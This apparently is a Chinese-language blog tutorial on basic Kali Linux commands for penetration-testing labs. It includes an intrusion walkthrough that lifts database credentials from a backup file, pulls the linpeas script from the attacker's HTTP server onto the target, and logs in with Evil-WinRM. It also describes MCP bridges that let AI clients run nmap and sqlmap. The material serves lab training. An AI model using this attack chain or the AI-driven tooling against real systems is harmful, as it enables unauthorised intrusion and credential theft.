文章总结: 本文介绍了Kali基础命令在渗透测试中的应用,包括系统信息与网络排查、文件与进程管理、网络扫描与Web测试等,并提供了实战案例和常见问题解答。
综合评分: 85
文章分类: 渗透测试,实战经验,网络安全,安全工具,技术标准
Kali基础命令实战手册:这20条不会,你连靶场都连不上
原创
klsec
klsec
昆仑AI安全实验室
2026年10月11日 00:00
广东
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
刚装好Kali,打开终端,面对黑框框不知道敲什么?网上教程一堆,但真到实战的时候,连不上网、找不到文件、服务起不来,还是得靠最基础的那几条命令救命。
我个人认为,发现一个规律:工具可以慢慢学,但基础命令不熟,连靶场都搭不起来。今天把渗透测试中最常用、最容易被忽视的Kali基础命令整理出来。每条都配了真实场景,不是干巴巴的语法手册。
一、系统信息与网络排查:先搞清楚你在哪
查看IP地址
ip addr show
别再用ifconfig了,Kali 2026默认没装net-tools。ip addr是标配,简写ip a也行。如果你只想要IPv4地址:
ip -4 addr show
实战场景:刚装完Kali连不上网,第一件事就是看有没有拿到IP。如果eth0没有inet地址,执行sudo dhclient eth0手动获取。
测试连通性
ping -c 4 8.8.8.8
-c 4表示只发4个包就停。别傻乎乎ping到天荒地老。如果ping不通外网但能ping通网关,说明DNS有问题,检查/etc/resolv.conf。
查看路由表
ip route show
默认网关是哪台设备,去往某个网段走哪个接口,这条命令一目了然。靶场环境里多网卡时,路由配错是连不上靶机的最常见原因。
查看端口监听状态
ss -tulnp
-t TCP,-u UDP,-l 监听,-n 不解析域名,-p 显示进程。比netstat快得多。实战中起了一个服务但连不上,先用它确认端口有没有真的监听。
二、文件与进程管理:渗透测试的日常
快速查找文件
locate 文件名
比find快一个数量级,因为它查的是预建的索引数据库。如果提示数据库太旧,执行sudo updatedb更新。
实时查找并执行操作
find /var/www -name "*.php" -exec grep -l "eval" {} \;
在/var/www下找所有PHP文件,并检查哪个文件里含有eval——一句话木马的典型特征。
实时追踪日志
tail -f /var/log/syslog
-f表示持续输出新增内容。实战中,你启动了一个服务或者触发了一个漏洞,想实时看日志有没有报错,这个命令就是你的眼睛。退出按Ctrl+C。
服务管理
sudo systemctl start sshsudo systemctl status ssh
status是排错第一步。服务起不来,先看它的状态和最近日志。journalctl -u ssh -n 50查看最后50行日志。
后台运行任务
nohup python3 -m http.server 8080 &
nohup让命令在你退出终端后继续运行,&把它放到后台。渗透测试中,你经常需要起一个临时的HTTP服务器来传文件,这条命令是标配。
三、网络扫描与Web测试:渗透测试的核心
Nmap快速扫描
nmap -sV -T4 192.168.1.1
-sV探测服务版本,-T4是速度模板(1-5,4算比较快但不会太暴力)。新手最常犯的错误是忘记-sV,结果只看到端口开放,不知道跑的是什么服务。
扫描整个网段
nmap -sn 192.168.1.0/24
-sn只做主机发现,不扫端口。快速摸清网段里有哪些设备存活。靶场环境里,第一步永远是先找到靶机IP。
目录爆破
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html
-x指定扩展名。发现80端口开放后,扫一下目录是标配操作。如果gobuster扫不到东西,换ffuf试试,它的过滤选项更灵活:
ffuf -w /usr/share/wordlists/dirb/common.txt -u http://target.com/FUZZ
curl快速验证接口
curl -I http://target.com
只看HTTP响应头,快速判断目标的技术栈。检查Server、X-Powered-By、Set-Cookie这些信息。加-X POST -d发POST请求:
curl -X POST -d "username=admin&password=123456" http://target.com/login
wget下载文件
wget http://target.com/backup.zip
渗透测试中,你经常需要从目标服务器下载备份文件、配置文件。wget -c支持断点续传。
四、2026年新增:AI工具链集成命令
这是2026年环境配置最大的变化。你不再只是装工具,还要把AI接进来。
Kali官方MCP桥接
Kali在2026版本中正式集成了mcp-kali-server包。安装:
sudo apt install mcp-kali-server
启动服务端:
kali-server-mcp --port 5000
--ip参数默认绑定127.0.0.1,如果需要从其他机器访问,指定IP。然后在AI客户端(Claude Desktop、Cherry Studio等)中配置MCP连接,指向http://你的Kali-IP:5000。AI就可以通过自然语言调用Nmap、sqlmap、gobuster等工具了。
HexStrike AI
HexStrike AI是目前开源社区最活跃的AI渗透工具链,支持150多种安全工具。Kali官方仓库已经收录
sudo apt install hexstrike-ai
启动服务端:
hexstrike_server
默认监听127.0.0.1:8888,150多个集成模块和自适应AI决策引擎自动启动。然后在Cherry Studio或Claude Desktop中配置MCP连接。
NetExec(nxc)
NetExec是CrackMapExec的继任者,目前版本1.5.1。SMB协议枚举:
nxc smb 192.168.1.0/24 -u user -p password --shares
支持SMB、LDAP、WinRM、SSH、RDP、MSSQL等十种协议。
Ligolo-ng隧道
Ligolo-ng是目前最流行的内网穿透工具,使用TUN接口而非SOCKS代理。在Kali上创建TUN接口并启动代理:
sudo ip tuntap add user $USER mode tun ligolosudo ip link set ligolo up./proxy -selfcert
Evil-WinRM
拿到Windows凭证后的WinRM Shell:
evil-winrm -i 192.168.1.1 -u Administrator -p Password123
支持Pass-the-Hash(-H参数)和Kerberos认证。
五、实战案例:从零到Shell的完整命令链
假设你在一个靶场环境,IP段是192.168.1.0/24。以下是你需要敲的命令序列:
# 1. 找到靶机nmap -sn 192.168.1.0/24
# 2. 扫描靶机端口和服务nmap -sV -T4 192.168.1.50
# 3. 发现80端口开放,用curl看看是什么curl -I http://192.168.1.50
# 4. 发现是Apache,扫一下目录gobuster dir -u http://192.168.1.50 -w /usr/share/wordlists/dirb/common.txt
# 5. 发现/backup/目录,下载备份文件wget http://192.168.1.50/backup/backup.zip
# 6. 解压后发现数据库配置文件,拿到密码unzip backup.zip && cat config.php
# 7. 尝试连接数据库mysql -h 192.168.1.50 -u root -p
# 8. 如果数据库不允许外连,用SSH隧道ssh -L 3306:localhost:3306 [email protected]
# 9. 拿到Shell后,起一个HTTP服务器传工具nohup python3 -m http.server 8080 &
# 10. 在目标机器上下载工具wget http://你的KaliIP:8080/linpeas.sh
这条链里的每一条命令,都是前面20条里的。没有花哨的技巧,就是基础命令的组合。
新手常踩的坑
坑一:ifconfig找不到命令。 Kali 2026默认没装net-tools,用ip addr替代。
坑二:ping不通就以为没网。 有些环境禁ping,但TCP端口是通的。用nc -zv 目标IP 端口测试端口连通性。
坑三:apt update报错。 检查/etc/apt/sources.list里的源地址,Kali滚动更新要用kali-rolling。
坑四:反弹Shell连不上。 检查Kali的防火墙,sudo ufw status。临时关闭:sudo ufw disable。
写在最后
Kali的工具成百上千,但真正常用的基础命令就那么几十条。把上面这些刻进肌肉记忆,你至少不会在靶场里卡在“连不上”或者“找不到文件”这种低级问题上。
工具会更新,命令的底层逻辑不会变。先把基础打牢,再去折腾AI工具链、MCP服务器、自动化编排。地基没打好,楼越高越危险。
严正声明
本文所述所有命令和操作仅用于已获得明确书面授权的安全测试、研究和教育场景。靶场环境应部署在隔离网络中,禁止将靶场暴露在公网。HexStrike AI的CVE-2026-90619、CVE-2026-90620、CVE-2026-90690已由上游确认并发布修复,请更新至最新版本。MCP服务器和AI工具的使用应遵守各平台服务条款,不得将敏感数据上传至未经授权的第三方服务。未授权扫描、测试、攻击行为均属违法,与作者无关。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:昆仑AI安全实验室 klsec
klsec《Kali基础命令实战手册:这20条不会,你连靶场都连不上》